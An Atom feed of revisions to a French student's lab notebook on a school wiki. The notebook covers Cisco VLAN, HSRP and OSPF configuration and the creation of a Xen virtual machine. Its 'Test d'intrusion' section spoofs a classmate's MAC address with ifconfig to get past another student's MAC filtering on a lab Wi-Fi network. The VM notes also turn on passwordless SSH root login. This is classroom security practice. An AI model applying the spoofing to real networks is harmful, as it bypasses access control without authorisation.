&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt; 2ème Étape : Travail commun &amp;lt;/h2&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Test d'intrusion&amp;lt;/h3&amp;gt;&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Création de la machine virtuelle&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22696</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22696"/>
				<updated>2015-11-03T21:48:13Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt; 1ère Étape : La configuration du routeur &amp;lt;/h2&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt; 2ème Étape : Travail commun &amp;lt;/h2&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Test d'intrusion&amp;lt;/h3&amp;gt;&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22695</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22695"/>
				<updated>2015-11-03T20:48:49Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt; 1ère Étape : La configuration du routeur &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016&amp;diff=22694</id>
		<title>TP sysres IMA2a5 2015/2016</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016&amp;diff=22694"/>
				<updated>2015-11-03T20:01:58Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Merci de référencer votre cahier de travaux pratiques ici.&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Cahier&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Elèves&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Tâche particulière&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[ TP sysres IMA2a5 2015/2016 G1 | Cahier groupe n°1]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Clément Millet&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Configuration routeur&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[ TP sysres IMA2a5 2015/2016 G2 | Cahier groupe n°2]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Gauthier Ryckeboer&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Configuration commutateur&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[ TP sysres IMA2a5 2015/2016 G3 | Cahier groupe n°3]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Maxime Strunc&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Point d'accès Wifi&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[ TP sysres IMA2a5 2015/2016 G4 | Cahier groupe n°4]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Marouane ACHKRA&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Point d'accès Wifi&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[ TP sysres IMA2a5 2015/2016 G5 | Cahier groupe n°5]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Nicolas Gunst &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; configuration EtherChannel, Câblage, Bridge&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
